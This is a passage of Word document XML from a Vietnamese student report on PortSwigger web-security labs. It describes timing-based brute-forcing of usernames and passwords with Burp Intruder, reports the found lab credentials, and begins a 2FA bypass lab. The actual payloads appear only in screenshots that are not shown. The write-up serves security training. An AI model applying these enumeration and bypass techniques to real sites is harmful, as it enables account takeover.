                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943905" cy="4711942"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D94438" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17960">
        <w:t xml:space="preserve">Tại </w:t>
      </w:r>
      <w:r w:rsidRPr="00F17960">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">payload set: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1AD843" w14:textId="4358CC6D" w:rsidR="00F67FB2" w:rsidRDefault="00BB4C3E" w:rsidP="00F67FB2">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00794543">
        <w:t>hực hiện truyền payload được cung cấp từ hướng dẫn</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E7337F" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00794543">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59110F66" wp14:editId="7E88A181">
            <wp:extent cx="6115050" cy="1861820"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="950243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43011" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId225"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1861820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AF489C" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:t>Chi tiết như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A81485D" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00794543">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AA8CFD1" wp14:editId="19396BCE">
            <wp:extent cx="6007409" cy="4934204"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1963802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02208" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId226"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6007409" cy="4934204"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC1DA66" w14:textId="40A75720" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:t>Sau đó bắt đầu tấn công, kết quả trả về như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E440E3" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="004F0E8D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ghi chú:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Khi quá trình tấn công kết thúc:</w:t>
      </w:r>
      <w:r w:rsidRPr="000A623F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AE9805F" wp14:editId="7AEEA1BD">
            <wp:extent cx="6115050" cy="376555"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="800909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09054" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId227"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="376555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="769A2964" w14:textId="3C32147F" w:rsidR="00F67FB2" w:rsidRDefault="00BB4C3E" w:rsidP="00F67FB2">
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve">họn 2 cột </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004F0E8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Response received</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004F0E8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Response completed</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> để chuẩn bị xem kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1332D4DF" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="000A623F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FBFB8B6" wp14:editId="691DEB11">
            <wp:extent cx="1562180" cy="2006703"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="479550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50902" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId228"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1562180" cy="2006703"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="201D2616" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:t>Kết quả trả về như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194AE0E1" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="000A623F" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="000A623F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BCFD9EC" wp14:editId="2FE7F80B">
            <wp:extent cx="6115050" cy="4906645"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="5034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377" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId229"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="4906645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A1C4C5" w14:textId="72710CDB" w:rsidR="00F67FB2" w:rsidRDefault="00BB4C3E" w:rsidP="00F67FB2">
      <w:r>
        <w:t xml:space="preserve">Lúc này </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve">có được username là </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">test </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="000326A0">
        <w:t xml:space="preserve">(vì đây là </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="000A623F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cột có thời gian phản hồi nhiều hơn</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="000326A0">
        <w:t xml:space="preserve"> nên username này là hợp lệ)</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210699C7" w14:textId="76071B7A" w:rsidR="00F67FB2" w:rsidRPr="00411FB7" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00411FB7">
        <w:t>Tiếp theo</w:t>
      </w:r>
      <w:r>
        <w:t>, tương tự</w:t>
      </w:r>
      <w:r w:rsidRPr="00411FB7">
        <w:t xml:space="preserve"> thực hiện tấn công để tìm password như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15462377" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00541CE3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71239882" wp14:editId="7D9E9D3F">
            <wp:extent cx="5264421" cy="406421"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="537554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54261" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId230"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5264421" cy="406421"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECB3A3D" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:t>Và payload cũng tương tự (truyền payload đã được cho bởi yêu cầu đề bài):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1585FDDF" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="000326A0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49037AFD" wp14:editId="2592148D">
            <wp:extent cx="6115050" cy="2172970"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1775238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38033" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId231"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2172970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="506900F8" w14:textId="09B60325" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r>
        <w:t>Chi tiết như sau (thay đổi tại Payload set 2, Payload set 1 vẫn giữ nguyên):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67570355" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="000326A0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="702B3A7D" wp14:editId="456FC260">
            <wp:extent cx="6115050" cy="4802505"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1734137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37819" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId232"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="4802505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1027BA89" w14:textId="61BF93F4" w:rsidR="00F67FB2" w:rsidRDefault="00BB4C3E" w:rsidP="00F67FB2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t>hực hiện tấn công và kết quả trả về như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2BC766" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00541CE3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B80A52E" wp14:editId="414DBA6A">
            <wp:extent cx="4864350" cy="4007056"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1325438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38695" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId233"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4864350" cy="4007056"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8D85A6" w14:textId="5C3F7F28" w:rsidR="00F67FB2" w:rsidRDefault="00BB4C3E" w:rsidP="00F67FB2">
      <w:r>
        <w:t xml:space="preserve">Lúc này </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve">có được password là: </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00541CE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>chelsea</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> (vì status trả về là 302 nên password này là hợp lệ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294CF2DE" w14:textId="04ABBD3F" w:rsidR="00F67FB2" w:rsidRDefault="00BB4C3E" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve">hực hiện đăng nhập với </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004F0E8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> là </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004F0E8D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004F0E8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F0E8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">là </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004F0E8D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>chelsea</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> là kiểm tra </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004F0E8D">
        <w:t xml:space="preserve">kết quả </w:t>
      </w:r>
      <w:r w:rsidRPr="004F0E8D">
        <w:t xml:space="preserve">thì </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="004F0E8D">
        <w:t>thấy thành công và hoàn thành thử thách của bài lab này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080E0605" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="008B273F" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00541CE3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DF55324" wp14:editId="278375BB">
            <wp:extent cx="6115050" cy="3182620"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="327378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78891" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId234"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3182620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D09995A" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="008B273F" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="008B273F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Mức độ ảnh hưởng của lỗ hổng: </w:t>
      </w:r>
      <w:r w:rsidRPr="008B273F">
        <w:t>High (cao) vì lỗ hổng này cho phép tấn công vét cạn username và password thông qua việc phân biệt thời gian phản hồi từ server sau khi thực hiện đăng nhập.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144CD9A1" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="00315F42" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="008B273F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
      <w:r w:rsidRPr="008B273F">
        <w:t xml:space="preserve"> Cần thực hiện chặn các request liên tục từ client lên server để ngăn chặn tấn công vét cạn username và password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0497C493" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_Toc182429529"/>
      <w:bookmarkStart w:id="89" w:name="_Toc182909890"/>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00B050BE">
        <w:t>09: 2FA simple bypass</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p w14:paraId="4D5CFCD0" w14:textId="44011EBE" w:rsidR="00F67FB2" w:rsidRDefault="00F656A4" w:rsidP="00F67FB2">
      <w:hyperlink r:id="rId235" w:history="1">
        <w:r w:rsidRPr="005F5562">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/authentication/multi-factor/lab-2fa-simple-bypass</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="035BA75C" w14:textId="7D3A0EA0" w:rsidR="00F67FB2" w:rsidRPr="00F656A4" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="002351AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô tả lỗ hổng:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F656A4" w:rsidRPr="00F656A4">
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="00F656A4">
        <w:t>ượt qua cơ chế xác thực hai yếu tố bằng cách truy cập trực tiếp vào một phần của trang web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E302832" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRPr="007C6498" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="002351AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Các bước thực hiện khai thác và bằng chứng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4882F3B6" w14:textId="365C2CB4" w:rsidR="00F67FB2" w:rsidRDefault="00BB4C3E" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:t xml:space="preserve"> Truy cập vào task:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CC562C" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="008202DB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79483EC1" wp14:editId="639C5850">
            <wp:extent cx="6115050" cy="2152015"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="588840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0703" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId236"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2152015"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5412B3A5" w14:textId="56A4897B" w:rsidR="00F67FB2" w:rsidRDefault="00BB4C3E" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00BB4C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="008202DB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Đăn</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="008202DB">
        <w:t xml:space="preserve">g nhập vào tài khoản trong trang web với tài khoản: </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00F656A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wiener</w:t>
      </w:r>
      <w:r w:rsidR="00F656A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="008202DB">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00F656A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00F656A4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>peter</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="008202DB">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F67FB2">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00F67FB2" w:rsidRPr="00CA1C6F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FF4EBF8" wp14:editId="720D9369">
            <wp:extent cx="6115050" cy="2736215"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="251994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94055" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId237"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2736215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C829CBA" w14:textId="77777777" w:rsidR="00F67FB2" w:rsidRDefault="00F67FB2" w:rsidP="00F67FB2">
      <w:r w:rsidRPr="00CA1C6F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DDD08FA" wp14:editId="73AE0C99">
            <wp:extent cx="6115050" cy="1656080"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="1806083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83797" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId238"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="1656080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
